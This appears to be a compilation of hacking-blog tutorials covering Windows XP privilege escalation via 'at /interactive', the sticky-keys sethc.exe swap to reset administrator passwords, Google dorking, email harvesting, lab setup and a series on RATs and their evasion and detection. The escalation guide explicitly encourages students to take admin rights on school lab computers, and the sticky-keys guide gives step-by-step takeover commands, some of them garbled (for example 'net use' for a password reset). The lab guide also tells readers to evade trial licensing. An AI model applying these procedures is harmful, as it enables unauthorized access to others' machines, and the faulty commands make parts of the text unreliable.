Gain Admin Privileges From Guest Account

Gain Admin Privileges From Guest Account

(Works only on Windows XP)

Most of you may have already seen a student of your college or school performing this hack on lab computer. Students generally don't have Administration privileges on lab computers to copy or install applications where they use this hack to gain some real stuff done on PC.

Vulnerability:

Windows command line task scheduler supports interactive mode which works somewhat same as sudo -i or su -i command in Linux/UNIX the only problem is that it does not ask you for password. This vulnerability is patched up in further versions of Windows than XP and works fine even in XP-3.

Procedure:

Open command prompt and type

c:\>time

and note the time, time will be presented in 24 hour clock format. Note this time.

Now open “Task Manager” by typing

“c:\>taskmgr”

now from processes and end explorer.exe .

Now type,

c:\>at [(time displayed in 24 hour clock format)+2 minutes] /interactive cmd.exe

for example

---

c:\>time

The current time is: 0:27:11.68

Enter the new time:

c:\>taskmgr

c:\>at 0:29:00:00 /interactive cmd.exe

--

Now type c:\>exit

and wait for two minutes. After two minutes command prompt will open in interactive mode with all administrative privileges without asking you for password. Now run any command from it it'll run with full administrative privileges so that you can even install programs and applications in system. So type “explorer.exe” in cmd and use system with administrative privilege even when you are in guest account.

Countermeasure: Disable command prompt for guest account.

By the way no college can ever disable command prompt because practicals are done over it, so guys get your stance and enjoy freedom.

Google Hacking

Google Hacking

Google hacking, most commonly misunderstood words by newbies as making queries on Google search to find out songs and movies. But it is just part of scope that Google hacking covers, experienced hackers will find this article as incomplete though it is stuffed with lot of things.

What is Google hacking:

Google hacking is term given to create and use complex queries on search box to get expected results from Google. But in reality it includes using each and every tool that is provided by Google as hacking weapon. Did I forget to mention Google Hacking is part of Reconnaissance, that means if you have skipped previous posts then it will be harder for you to understand power of Google Hacking. In this section I 'll show you using some of its applications as hacking related tool rest is left to your creativity.

Cached Pages:

I know each and everyone of you have some day used Google in spite of what your favorite search engine is. You must have seen a link to “Cached Similar” pages whenever you run any search query. Cached pages store history pages for its users like you and me. Cached pages is good source of tracking down website activities. Suppose site contains a file whose link is removed from main website, now you want access to that file, cached pages can help you out.

OK now please type “DAYS OF LIFE OF DEVIL” in Google and browse for cached pages, note differences between main site and cached site.

Google Translator:

You might not be knowing but you don't need proxy servers to bypass security because we already have a online proxy tool known as “Google Website Language Convertor”. This is Google’s online tool for converting language of website to your native language(The Language Convertor you can see on this website is nothing but derivative of this tool), the powerful feature of this Google applications is that it can be used as proxy server. When you'll type “Google Website Language Convertor” it'll open for you following link,

http://www.google.com/language_tools?hl=EN

Now type URL of website you want select language conversion and press enter, if your page is already in language you want to browse it then select any language from “from” section and select your language in “to” section.

Basic Search Queries:

link:

This query searches for all links that ends to site mentioned after query.

Syntax: link:“http://nrupentheking.blogspot.com”

inurl:

This query will search occurrences of word specified in URL 's.

Syntax: inurl:“NRUPEN”

site:

This query is used by combining it with other queries. So we will discus it later.

Intitle:

This query will search occurrences of word specified in title or website.

Syntax: intitle:“NRUPEN”

filetype:

This query will search occurrences of filetype specified.

Syntax: filetype:doc “Google hacking”

Directories And Files Listing:

Apache server by default uses “Index of ” type title to transverse navigation which can be exploited using Google queries to get specific file or folder.

Syntax: intitle:index.of “songs”

Now try to figure out what what above query will do.

Grabbing Banner:

Banner Grabbing is method in Scanning phase which is used for getting type and version of application. Here for now, we will skip it and will open our look for it while discussing scanning phase.

Combining Queries:

Now all above queries mentioned above can be combined to get powerful information from search engine via victim. It can open nearly everything about victim about software, hardware, documents if victim is unprotected against Google Crawlers. Depending upon your skills we leave how to use them combined for purpose but will show you how to combine them.

Try following one by one, one you use them you'll know which combination can be used when,

site:nrupentheking.blogspot.com + inurl:hacking

site:nrupentheking.blogspot.com inurl:hacking

inurl:admin inurl:php

Johnny Long:

Johnny Long maintains a website which keeps a brief database of using Google search queries. Browse for his name and you'll be lead to his website were you can click on Google Hacking Database to learn more than what we discussed here.

Google Hacking Tools:

There are several search quires that you can make using Google but remembering them is not that easy task so we have some ready made tools that do our job for us. Following are some of them,

Site Digger Tool: Uses Google hacking database to give out results from caches and also traces errors.

Gooscan: This tool also uses Google Hacking database and is also able to mark out vulnerabilities.

Google Hacks: It is one the most used Google hacking tools. Have very easy and understandable user interface, can solve all your download needs, must use tool for everyone.

Note: Please be sure we have not covered everything related to Google Hacking. I just gave some brush up so that you can practice them then I 'll cover Advanced Google Hacking, please note that maximum of our Google hacking queries are formed using above search queries so please practice, advanced Google hacking will be covered at last stage of reconnaissance phase. Please don't forget to ask whatever you were unable to understand in this post. Thanks for reading and keep visiting.

Sticky Key Method To Hack Windows Password

Sticky Key Method To Hack Windows Password

This is one of the old tricks that was used to hack windows password, it works even today is big surprise. So lets see how this works.

Vulnerability:

When you press shift, alt or ctrl for more than 5 times windows opens sticky keys options for you. But this is not vulnerability, vulnerability is that it even works when you are on log-in screen. Our this hack uses this vulnerability to hack administrator password, works nearly in all versions of windows.

Procedure:

To make this work first of all take a bootable CD, Linux live CD can be preferred. Now browse through “C:\Windows\System32” folder and search for sethc.exe file, this is the file which is called when you press shift, alt or ctrl more than five times. Rename this file to anything and search for cmd.exe file, create its copy and rename that file to sethc.exe. Now reboot your system when your log-in screen will appear press shift key more than five times command prompt will open in front of you. Type following commands,

c:\>net user

It 'll show you number of users of that system watch for “administrator”. If it is not present there type following commands for each user

c:\>net user <username>

and check its “Local Group Membership” for administrator. Once found administrator type following commands,

c:\>net use {administrator/user with administrator privileges} 12345

Press enter now login to administrator account with password 12345. By using above command you'll reset password of administrator to 12345. You can use any password that comes to your mind. Please try this on your virtual system(for more info on virtual system read “Basic Lab Setup For Hacker”).

Counter Measure: Disable all sticky keys option, its just that simple.

Note: I know I started windows hacking phase without completing reconnaissance/footprinting. But I think you'll get bored if we will continue only reconnaissance because reconnaissance is completely passive phase so I thought its better to keep things interesting. We will cover reconnaissance and windows hacking in parallel. Don't forget to tell me your views about above hack. Thanks for reading and keep visiting.

Getting Whois/Domain Information

Getting Whois/Domain Information

As mentioned earlier reconnaissance/foot-printing is very first step in hacking. In involves gathering all potential information about target system that may help attacker plan and execute attack. It is not bluff that attacker spends 90% of his/her time for this phase only then uses his/her technical skills to find and exploit weakness in system according to his/her conclusion.

Even foot-printing/reconnaissance involves various things depending on type of victim you are planning to attack. In this post we'll discuss how you can extract information like domain name, domain name provider, owner of domain, his/her name, address telephone number etc..

Whenever we purchase a domain it must be registered, this registry of domain names and their owner is known as domain information database and it is shared over internet for other users to get information about whether a domain is available for them or not. This information is also known as whois information of a domain. Here you will learn how to extract this information from database stored over network. Following is list of websites and tools that can help you extract this information.

Sam Spade (tool)

Smart Whois (tool)

http://samspade.org

http://whois.domaintools.com/

http://robtex.com

You'll not require any skills to use these tools. They are very easy  to operate as taking a lolly pop from a kid, what really difficult is to analyze the information you will be getting after using them. In Sam Spade type name of domain you want to get information for example www.google.com and press enter.

My next choice is Smart Whois which also works like Sam Spade but the fact is that usually all prefer Sam Spade, even I am not exception. When Sam Spade will fetch you results look on left side, there you'll find several options try them one by one and analyze the result it had fetched for you.

Next is using websites that can fetch you that result. As you can see I mentioned three online tools but before you read further I must tell you there are thousands of websites and tools that can fetch you whois information, the one that are mentioned here are my personal preferences. Type domain name in search box of http://robtex.com and press “Lucky” and in http://whois.domaintools.com type domain name in search box and press lookup.

Do it yourself and ask if you encounter any problem.

From Where Spammers Get You E-mail Ids

From Where Spammers Get You E-mail Ids

I know many of you always receive a special kinda e-mail with advertisements known as spam and you might be asking yourself from where a spammer might have got your e-mail ID. So here's the answer, following are some of the methods via which spammers gets your email ids.

Social Networking Sites:

If you are a social network animal then you might be knowing that sometimes we just add anyone as our friend without even knowing who the person is. Reason, most of us just wanna show off that we have a big friend list. But there are some people who are actually preparing this friend list to get your e-mail ids. People hardly care about privacy settings and leave their telephone numbers and e-mail ids open for spammers to have a look on. Now how they extract your email ids, all major e-mail clients like gmail and yahoo provide their users with API(Application Programming Interface) to pull e-mail ids of friend list available on social networking sites. Once all emails are pulled spammer download this email list as excel sheet and your e-mail ids are now ready to get spammed.

Online Applications:

If you have ever used facebook then you might be knowing whenever you access any facebook application it asks for access to all your private data, once you allow application access you give your e-mail to them, now they can use it for any purpose.

Online Games And Contests:

Many people have habit of playing games online and contests that appears free with prize. The fact is that many people might be playing those games and only one gets prize via lucky draw. How much legitimate that appears. These contests are nothing but sure shot fundas of companies to grab personal details of people visiting their sites. How this pays them, this list helps them prepare job lists for eligible and needy persons thus they don't pay a penny for job recruitment and also gets an employee ready to work on minimum payments. Next they can use this list to spam you with advertisement of their own products or they may even plan to sell their e-mail list to spammers for hefty amount.

Job/Technology/Career/Game Fairs:

You might have seen many people standing with some kinda forms in these kinda fairs to lure people with job opportunity, free stuff delivery or contest, which actually never is the case. Such fairs are good targets since by spending just few bucks a contact list with several thousand e-mail IDS and phone numbers is built that too without anyone suspecting.

Online Forums:

Hey don't worry I don't mean they sell e-mail ids or their database are hackable. While on forums many people unknowingly don't set privacy settings, also they post their e-mail ids as it is as comment or reply. These e-mail ids can be extracted using software used for extracting e-mail ids.

Web Mail Extractors:

Web Mail Extractors are software that search websites for patterns like this “@domain.com/@domain.net,/@domain.org etc”. Once found they extract complete email ids and save them in their database. One such tool is “Web e-mail Miner”. For today I would advise you to download it and try to find out how it works. Don't worry about how to use it, you just have to enter name of site and press enter and it'll pull email for you. Try a name of famous online forum, guaranteed to get a list with more than thousand e-mails.

Improperly Configured or Unprotected Servers:

Usually company uses two kinds of domains/servers one valid of all and one valid only for their employees and customers. Sometimes these two are interconnected with each other for employees to make changes to website that is public. The internal server for employees usually contains lot of information about their employees and job recruitment in excel sheets or PDF files which can be opened using browser. If they are not configured properly “Web Mail Extractors” can easily crawl in revealing thousands of quality e-mail ids.

Knowingly or unknowingly we might have made many of above mistakes which has lead our e-mail ids open to spammers. To next section to this we'll learn how we can keep ourselves safe from getting spammed. Feel free to comment about what you think about above information. Thanks for visiting, have a nice time and keep visiting.

Steps Involved In Hacking

Steps Involved In Hacking :-

As mentioned earlier ethical hacker takes same steps as malicious hacker. Following are different steps that are performed during hacking.

1.Reconnaissance:

This step involves gathering potential information about target system. In fact hacker spends 90% of time for this phase only and next 10% time for rest of the steps.

2.Scanning:

During this phase network is scanned for vulnerability.

3.Gaining Access:

This is the step where real hacking takes place. Hacker takes advantage of vulnerability found in scanning phase and penetrates the victim system.

4.Maintaining Access:

After gaining access hacker makes provision to come back by planting root-kit and backdoor.

5.Covering Tracks:

In this phase hacker removes all traces of his/her presence in system by removing log files and event logs.

Basic Windows Commands That You Should Know

Basic Windows Commands That You Should Know

So in this section we will discus some of the most used basic commands of windows and frequently used switches with them. Now why the hell in world of Graphical User Interface (GUI) of windows I need to learn windows commands? Answer is, no matter how much cool the GUI appears, the most powerful feature of any OS till today is its shell when comes to control,I may hardly get any to disagree on this and shell is handled with the help of shell interpreter/emulator better known as command line in common, command prompt in windows and terminal/konsole/tsch/zch etc in Linux depending on shell emulator. As a hacker you must be able to master most of the commands and their most commonly used switches. So get ready to have a look on them,

attrib: (attributes) is used to set attributes of a file or folder.

Syntax: attrib filename/foldername

most commonly used switches includes: +h -h,+r -r,+s -s, /s /d

where 'h' means Hide attribute, 'r' means read,' s' means system,

'/s' means apply to files in folder and “/d” means apply to folders inside

'+' means apply attributes, '–' means remove attributes

Example: attrib +h +r +s /s /d c:\max

this will apply hidden, read only and system file attributes to all files and folders of folder max

cd/chdir: (change directory) is used to change directory.

Syntax: cd option

where option may include full path of folder where you want to jump.

Example: “cd d:\demo” will take you to demo folder in d drive in spite of where you are at present.

Cd .. go one step back.

Cd\ return to main drive.

Compact: Used to compress contents of folder without zipping or archiving them.

Syntax: compact options foldername

Options are 'c' means compress, 'u' means uncompress 'f' force compression

Example: This command is mostly used link this

compact /c /f folder_name

compact /u /f foldr_name

Copy: Used to copy files(not folder)

Syntax: copy /option source_file destination

Options can be left blank and mostly left blank. Most used switches includes 'a' which means ASCII file and 'b' which means binary file.

Example: copy c:\robot.txt d:\ this will copy robot.txt file from c to d drive.

Mkdir: used to crease folder

Syntax: mkdir drive\foldername or mkdir foldername

Example: mkdir max

mkdir a\b\c\v

Rename: used to rename file

Syntax: rename file1 file2

Example:rename max.txt dave.txt

this will rename max.txt to dave.txt

RD\Rmdir:(remove directory) Used to remove directory

Syntax: rmdir directory_name

Example: rmdir max

This will remove directory named max.

Other commands:

Date: Displays ans sets date.

Time:Displays and sets time.

Tasklist: Shows running processes

Taskkill: Used to kill a process rather than going in switch detail I 'll directly show you syntax to kill a process but first get process ID by executing Tasklist.

Syntax: taskkill /PID process_id /f

Example: taskkill /PID 1234 /f

Now so far as I think no one can remember all those switches so better try to use “command /?” this will open help pages for command. Note that we haven't yet covered all commands we just took an overlook over most basic windows commands, with time we'll move ahead and learn some really complicated commands and their switches. Till then I recommend you to try to run and execute all these commands and also try to find out other switches used while using commands by post-fixing commands with /? Commands like “set” and “net” may themselves need two to three posts like this so its better to cover them when need arrives. Till then if you have problem executing any of above commands feel free to ask.

Skills Required For A Hacker

Skills Required For A Hacker

Following are some must know things for a hacker or you can say requirements of hacker.

Operating System:

As a hacker you must have upper hand skills in Operating systems Windows, Linux and Unix. Once you master Linux and Unix you'll hardly face problem getting yourself on MAC. As we'll move further we will cover both of them in short and then slowly move our level to advanced.

Networking:

A hacker must have expertise in field of networking even if you don't have them you must be knowing about some basic terms used in networking. Please click on following links and try to grasp topics as thoroughly as you can.

OSI Model/Internet Protocol Stack

Network Topology

The reality is that a hacker should know networking to best level. Just knowing above terms is not sufficient though you'll not encounter that much problem while learning. We still recommend you buying a book on networking that should cover networking to level of pin points. My personal favor is to book Data Communication And Networking by Behrouz Forouzan if you want to start. Click on following link to know more, read people's view or if you want to purchase.

Data Communications and Networking (McGraw-Hill Forouzan Networking)

Knowledge About Setting Up And Configuring Servers:

Yes that is necessary for a hacker so when we will move ahead with flow. We will cover configuring IIS 7, Apache, Vertrigo on Windows and Apache on Linux. Both HTTP and FTP servers will be covered.

Programming:

Absolutely no one can deny all best hackers in world have master hand in programming. Following are must know programming languages but you can even make things work even if you don't know them. In any case I would recommend you learn programming.

HTML, C, C++, Java, SQL, Python, Perl, PHP and Ruby.

At most basic level my advise will be you must know HTML, C, SQL, PHP and ruby.

Tools:

Backtrack is platform which is specially crafted and designed for penetration testing. Metasploit is framework that is used to create and experiment with exploits and payloads. Both are must for a hacker today. Alternative to Backtrack is Knoppix Security Edition and Mautrix, if you master Bactrack you'll easily master both of them. So I will not leave them apart from our list, we'll also cover them.

Basic Lab Setup For Hacker

Basic Lab Setup For Hacker

In this tutorial we will discus how you can setup a lab for yourself to practice hacking on your system. At very basic level a hacker is in need of 2-3 systems with a Wired LAN or Wireless LAN. But if you are the one who has started just like me with just one laptop or computer then possibly there's no way you can match this setup. So following was my solution to start practicing with only one laptop or PC meeting above criteria of multiple computers connected in LAN. At most basic level following are your requirements.

Requirements:

A Computer:

First of all a computer which must have minimum following configuration.

A processor with 1.7GHz clock speed,

120GB + Hard disk

2GB RAM, Please note than your RAM must be above 1GB for practicing. If your RAM is less than 1GB or 1GB I 'll highly recommend you buy 512MB module extra or 1GB gigs for you.

A Virtual PC Emulator:

A virtual PC emulator is needed since I assumed you don't have multiple PC's to setup your lab, even if you have it I would prefer to advice you to use a Virtual PC Emulator. There are several options to pick from but our pick is “Oracle's Virtual Box”. Reason its open source means free, low on resources, supports all kind of network types, no problem to setup screen options, it automatically setups resolution once you install guest installation and have nearly all that features that a professional virtual PC emulator may have. Following is download link to virtual box latest version.

http://www.virtualbox.org/wiki/Downloads

A professional choice is VM-Ware. You can purchase it from following link if you want to run it on Mac.

VMware Fusion4

Though VM-Ware have several advantages over Virtual Box, virtual box is just good to go. Prefer it if you want to shed money.

An Online Synchronization Service:

If you think even that needs shedding money, then I want to assure there's again a free alternative available, its name is Drop Box. Go to : www.dropbox.com  and create your personal free account then download its setup file and install for synchronization.

A Static IP Address:

Now that will be problem to get a static IP address since a static IP Address may cost you nearly $100 I.e approximately Rs.5000. But don't worry about it we have a free alternative solution to counter problem of static IP. So when there'll be need I 'll clear how to tackle it else even if you have money to shed I will not recommend it.

A PC restore utility:

There are no free alternative to PC Restore Utilities so we will work out on evaluation version. Download Farconics Deep Freeze 

IP Address Hiding Utility:

Proxy Servers, Anonymizors and VPS are some IP address hiding options. We will discuss them when their need will come in to play.

High Speed Internet Connection:

Of course when you want to learn hacking you need a high speed Internet connection. Opt for a USB dongle by BSNL, TATA, Reliance as mobile broadband and BSNL land-line broadband is just much better option. If you don't have high speed connection and you work on slower connection like GPRS and dial-ups its hard to learn hacks done over Internet.

Procedure:

Before you proceed create a separate partition for installation of Virtual system, the partition must be at least 15GB in size. First of all download latest version of Oracle's Virtual Box and install it on your system. While installation it'll ask several times about installing various components just press OK for all of them because you'll need them all.

Once installation is done virtual box will come up with several pop ups when you'll be using it, please read each pop up because they are your tutorials to master “Virtual System Environment”. Please please please, don't skip any of those pop ups. When your installation will be over you'll see virtual system isn't really working in full screen. To tackle it run virtually installed system click on devices and “Install Guest Additions”. From next time it will run in full screen.

Setting up virtual system is done, now jump up to the next part start your virtual system open web browser of virtual system and download Drop-Box application and sign in to it. Now onwards whenever you'll download any software for hacking paste it into Drop Box default folder, it'll synchronize it with your online storage. After installing and signing up Drop Box download Deep Freeze don't install it now. Shut down your Virtual System and copy virtual hard disk as backup in another folder, start system and install Deep Freeze, before installing it read its online manual so that you should not get problem using it. Now when your Deep Freeze evaluation time expires just delete older hard disk and copy the backup and start over again. This will keep your evaluation copy last forever. If you haven't yet understood what we actually did with virtual box then I should clear we just setup a Virtual LAN for our practice using just a single computer. So you can't now boast you don't have a LAN to practice or a remote host to practice. You can run two virtual systems simultaneously if you have at least 2GB RAM. This not only solves our problem of private LAN to practice but it indirectly also offers you remote host to attack on. Our personal say is don't install virtual system on Windows XP or Vista, get Windows 7 or Server 2008.

Lab setup tutorial is over now go and setup your systm to get started. Please ask if you have got any problems related to setup, if everything is fine please don't forget to convey me. Thanks for reading keep visiting.

Ethical Hacking | An Introduction

Ethical Hacking | An Introduction

Whenever term hacker comes before many people consider it as a guy sitting inside a room or garage with a bottle or beer and a Laptop or Desktop doing wonders on click of buttons. But the reality check is hacking is not that easy as portrayed in movies and television and term hacker doesn't mean a computer criminal.

So here first of all we'll clear all our misconceptions related to words hackers and hacking.

From Where This Word Came:

The word hacking has history in late 1960's, the time when computers were nothing but mighty pieces of machines and a computer just meant a machine that can compute. Electrical and Electronics geeks used to optimize circuits to make any system/circuit work faster, better and reliably. The job they used to do on circuits was known as hack. With time computer geeks also started finding way out to optimize their system to work better so in fact hacking was nothing but always a kind of reverse engineering. With time in professional world a word hacker got meaning, a person who is highly skilled in hardware, software and networking components. Then movies started portraying hackers do only dirty works and hence today the word hacker has a negative face according to people. No matter how the word met to a dreadful end a hacker always had all qualities that was first put forward in its definition may the be criminal or ethical. Criminal hackers are also known as Crackers.

Types Of Hackers:

White Hats: White hat hackers are good guys who use their hacking skills for defensive purposes. Organizations and industries pay them high salaries to protect their systems and networks from intrusion.

Black Hats: Black hats are actually bad guys in filed. Their main job is to breach security and make money. They make money by using their hacking skills for offensive purposes.

Grey Hats: Gray hats are hackers who work for offensive and defensive purposes depending on situations. They are hired by people to intrude and protect systems.

Hactivist: A hacktivist is kinda hacker who thinks hacking can bring out some social changes and hacks government and organizations to show his discomfort over some trivial issues.

Suicide Hackers: Suicide hackers are those who hack for some purpose and even don't bother to suffer long term jail due to their activities. They can be bad as well as good.

Script Kiddie: A script kiddie is a person who boasts breaking system using scripts and codes written by others though he hardly knows what the code does.

Phreak: It is a person who tries to intrude systems for fun or malicious personal activities. Mostly they are children of age 12-15 who don't even know wrong consequences of hacking.

Types Of Hacking:

Local Hacking: This type of hacking is done when a hacker has full access to the system to implant a virus, keylogger and RATs

Remote Hacking: Remote hacking is done on a remote system using Internet.

Social Engineering: Social Engineering is kinda interacting skill that a hacker uses to manipulate people giving out sensitive information. Its kinda trick done using good verbal, social skills and understanding.

Terminologies Used Under Hacking:

Threat: A threat is an environment or situation that could lead to a potential breach of security. Ethical hackers look for and prioritize threats when performing a security analysis.

An Exploit: An exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.

Vulnerability: A vulnerability is an existence of a software flaw, logic design, or implementation error that can lead to an unexpected and undesirable event executing bad or damaging instructions to the system. In easy word vulnerability is weakness in system.

Payload: Payload is agent that helps in taking advantage of vulnerability in remote hacking.

Attack: An attack occurs when a system is compromised based on a vulnerability.

Types Of Attack:

1.Operating System Attack

2.Application level Attack

3.Shrink Wrap Code Attack

4.Misconfiguration Attack

Operating system attack is attack done on specific type of OS. Such attack is done using flaws in programs and services shipped with OS. Application level attack is done over faulty coding practices done over software during its development. Shrink Wrap Code attack are attacks done over UN-refined scripts used for making task simpler. Last is misconfiguration attack, it is kinda attack which is done over mis-configured system or a system with default settings.

Work Of An Ethical Hacker:

Job of an ethical hacker is to use all his skills and tools used by malicious hackers to find vulnerabilities in system and then provide it security against those vulnerabilities.

Conclusion: At last what I want to tell, nothing happens in clicks of buttons. A hacker is highly skilled person in field of computing who usually have ample knowledge about software, hardware, OS, networking and programming. A hacker may it be criminal or ethical has immense patience, determination, organization, discipline and persistence. An attacker may spend months of time planning, analyzing and executing an attack. This shows his level of dedication to achieve whatever goal he/she has set. A person can never become a good hacker unless he have all above qualities.

Note: Now onwards we will cover hacking as our main stream topic on this blog. Real hacking is never done over lamers who hardly knows about security, it is done over a person who is highly skilled as you are. You can never learn hacking until you do some practical and gain knowledge about field so now onwards I urge you to perform practicals that will be now posted on this blog on your own system. Next no tutorial will be taken as a lamer so they will be in possible higher details, so this may happen that you may not understand something. Rather than keeping yourself mum I plea you to please ask whenever you encounter a problem or get bothered by topic. Whenever I 'll post on hacking I 'll try to keep a theoretical and one practical tutorial, you are requested to read both and grasp matter completely. Thanks for visiting and please tell are you clear with all points discussed or need some explanation on your difficulty.

Prevention Against A RAT Attack

The RAT (Remote Administration Tool)

Prevention Against A RAT Attack

Now we are to the last part of RAT Remote Access Tool. Up till now we have covered how a RAT is created, how attackers manage to hide presence of RAT in victim's PC and how we can manually detect and take action against presence of RAT if our Anti-Virus Program or Security suite fails to detect it. Now in this part we'll learn how we can prevent ourselves from getting caught by a RAT attack.

As told in before blogs of RAT attacker does some process to hide detection of RAT from Anti-Virus program but you are not fool to click on any suspected file unnecessarily. So most of the time an attacker uses Trojan vector to execute his RAT server on victim. There can be many method an attacker can use to hide his malicious code in some kinda media that can transfer it to victim, such media is known as vector. A vector is responsible for spreading of viruses worms and RATs.

A vector may be a simple image file, executable file, media file or even a website. So now lets have our look on each one by one.

Vector Image File: As stated earlier a RAT file might be very very small in size of 100kbs-200kbs only. But as we are now prone to high definition image files only whose resolution usually remains above 1800x1600 with possible better color depth making it 1MB – 3MB in size. They can store 100-200kbs information in them very easily. If an attacker want to execute RAT from vector image it appends RAT to end of Image file thus when you click on image, image opens without any problem but also invokes appended executable ultimately infecting victim's computer. The appending is usually done via a software providing binary addition of files without change in their integrity. Now what is binary addition method to add files and how it works is beyond scope of this post. Now this kinda images are distributed by attackers using torrents and by spamming. Have you ever found an e-mail in your inbox with “Nude Pics Of Aishwarya Rai For Free(HD)”, “Katrina Kaif Nude Pics Revealed(HD)”. Now fact number one any how you always know that pics does not really exists and fact number two even if it exist then they are fake pics created using Photo editing tools like Adobe Photoshop or Gimp. Then why to make yourself eager unnecessarily. Keep yourself away from such things, these are tricks by attackers to download those high quality fake images in which they have hidden their dirty stuff.

Executable File: Many RAT clients by default offer you adding a legitimate executable file with their server code so that once the victim runs legitimate file he/she gets infected. These files are usually spread using torrents and Dark Warez sites. Dark Warez sites are those where a software is provided with its key-gen or crack executable, they are also known as pirate sites. Attackers usually bind their files in keygens and crack executable s, I think I don't need to mention this, because if you have ever downloaded any file from such kinda site your anti-Virus might have got in form. Most people disable Anti-Virus thinking its false alarm but Anti-Virus makers are not fools to give you a false alarm on every such file downloaded from Dark Warez site. They are actually malicious and hence we find most of our college computers are always infected with malware.

Media: Media files like audio and video both can contain malcious code and wrapping against them a RAT file can never get detected since we hardly find any reduction and compromise in quality of media. People who always stay online for movies and music usually become prey to such infected media files. A better defense is always keep your media players and flash player to newest version.

Websites: Now a days many web technologies allow a web page to execute Active X contents on the visitor's PC via browser. Browsers are per-configured to run scripts and scripting languages responsible

for execution of these Active X elements. Sites which support Java drive by and flash scripts are more likely to put you in trouble. That's the reason why most of the time I advise to avoid flash contents on your blog because they can be exploited very easily. To avoid getting infected from websites which run malicious codes on your PC always keep your eyes on notification and keep pop-up blocker on and use some good Internet security suite.

I hope we covered nearly everything related to RAT one by one. I hope I kept things pretty understandable and detailed so that you can grasp them easily. Tell me what extra you desire to know from me regarding this topic. Please don't forget to tell me are all those parts falls to your expected mark or not. Thank you, keep visiting and please convey me what are your opinion on all RAT related topics we discussed so far.

The RAT (Remote Administration Tool)

The RAT (Remote Administration Tool)

Counter And Defense Against RAT Attack

Before u read this I just want let you know about RAT

http://hackersknwoledge.blogspot.in/2013/05/rat-in-this-post-we-will-learn-how-to.html

http://hackersknwoledge.blogspot.in/2013/05/why-rats-dont-get-detected-why-rats.html

http://hackersknwoledge.blogspot.in/2013/05/tutorial-for-prorat-what-is-prorat.html

http://hackersknwoledge.blogspot.in/2013/05/how-hackers-send-virusrat.html

So as seen before RAT may use any unknown port to communicate with attacker and the best defense against any process communicating using unknown port is firewall. There are various commercial firewalls available but here are few good free firewalls that can even lead a commercial firewall bow down to its feet. Following are few good free firewall programs on basis of their ranking by customers,

1.Online Armour

2.Zone Alarm

3.Comodo Firewall

4.Private Firewall

People consider Online Armour as one of the toughest free firewall available, by the way I prefer Comodo Firewall. Comodo firewall also shows you process which are communicating, port numbers via which they are communicating and full path of process invoking executable file, here's a view of how Comodo shows you process.

A RAT becomes fully undetectable if he/she applies any process discussed in previous RAT post. That means if your anti-virus fails to detect it, following can be symptoms that can appear on your system which can help you identify its presence,

1.Disable Of Task Manager and Disable Of Folder Option

2.Sudden Opening And Closing Of CD/DVD-ROM

3.Blue Screen Of Death or Just Blue Screen

4.High Bandwidth Consumption

5.Sudden Open Of Web Pages

6.Pop Ups

7.Change Of Wallpaper

8.Disappear Of Mouse Arrow, Start Button and Task Manager

If you find any of the above things happening on your PC its time to manually check your system for RAT. But as I told you before RAT server may hide in known processes or may even use only known ports to communicate with attacker so detection would not be easy. Here we'll learn step by step approach how you can manually detect its presence.

As told earlier a RAT can hide it self in process space of another process like explorer.exe, iexplorer.exe, scvhost.exe, services.exe. Open your firewall and check out if explorer.exe or services.exe are communicating with remote host. If yes then you are infected because these processes never communicate with any remote host. Now the process that communicate are svchost.exe and iexplorer.exe.

To find out whether iexplorer.exe is communicating with remote host as client to installed RAT server close Internet Explorer, wait for 5-6 seconds and see if its communicating then you are infected. Now if attacker has configured to close connection as soon as Internet Explorer(IE) closes you will not be able to detect its presence in firewall, in this case you have to keep yourself prepared by watching how much memory IE takes while opening www.google.com leave IE like that and open “Task Manager” by typing taskmgr.exe in RUN window. Keep your eye on memory consumption(not CPU consumption) of IE if it fluctuates even after 1 minute then you can be sure you are 100% infected.

What if attacker decides to hide process in scvhost.exe? In this case open firewall and watch for ports with which svchost.exe is communicating. Make sure port numbers should be 53 or 443 on remote host in listening mode only, if not then you are infected. Now if attacker has planted port number 53 or 443 in RAT for communication with svchost.exe then how you gonna detect. Now here you'll need a little technical brain, a scvhost.exe process runs in three modes,

System Mode: Which never communicates with internet

Local Mode: Which never communicates with internet

Network Mode: Which communicates with internet.

All three modes run as different processes with different process IDs. Now the Network Mode scvhost.exe runs as network service, so open taskmgr.exe and locate scvhost.exe where username is Network Service now note process ID, disconnect from network and wait for 1-5 minute monitoring that process memory consumption. You have to wait for 5 minutes just because even after disconnecting scvhost.exe does not settle down network and hence memory usage appears fluctuating for long time. Once memory usage becomes stable then wait for sometime and monitor it for memory usage fluctuation, it should not be above 2 MBs.

Now above were manual method to identify presence of RAT in your system if your Anti-Virus and even malware detection software fails to detect RAT. So far as my view is concerned Norton, Avast Professional, Avira and AVG professional are best Security Suites available to tackle all kind of software based threats and malware. And if you use your system for critical purposes then you are the fellow who is in very much need of “Black Ice Defender”. It is awesome piece of code written specially to avoid any kind of intrusion on your system.

Now I know above article is real damn technical since I provided with details that hardly anyone could provide, please feel free to ask questions if something got very tough. In next part we'll cover what are precautionary steps towards a RAT attack till then have a nice time, keep visiting and don't forget to tell us your view about third topic to RAT Remote Access Tool series.

Why RAT's Don't Get Detected???

Why RAT's Don't Get Detected???

Why RAT's Don't Get Detected???

So we are back to the second part of The RAT Remote Administration Tool. In this section we will learn how an attacker manages to hide a RAT in victim's computer, if you are new visitor or you haven't read the first part I urge you to please go through previous post on The RAT before you read this.

Before we proceed I want to tell you there's no RAT tool available whose server can not get detected by an Anti-Virus program. At practical level every Anti-Virus program can detect RAT developed by all possible free as well as commercially available RAT developing tools. Then how an attacker manages to implement an attack on you. Following may be the reasons, why you may become victim to his/his attack,

Your Anti-Virus Sucks
The attacker has created his/her own RAT client
He had got a custom RAT client from RAT client vendor
Applied Hex-editing on his RAT server EXE
Attacker has used crypt or

As I always tell you hacking evolves by fractions of minutes to fractions of seconds, RAT clients also gets updated and hence your Anti-Virus too needs to be updated. If you don't update it means you are inviting more and more troubles than just RAT, always update your Anti-Virus programs or let its auto-update option enabled. In any other case than this if your Anti-Virus fails to detect RAT it means it is total crap UN-install it and use some another Anti-Virus program.

The second case is the attacker is master programmer and he/she has used his/her master programmer skill to develop a new custom RAT client. Since the code is new, no Anti-Virus will have its definition ultimately making it Fully UN-Detectable (FUD). It is really very hard to keep yourself safe from such kinda RAT since it is hard to detect before damage is done.

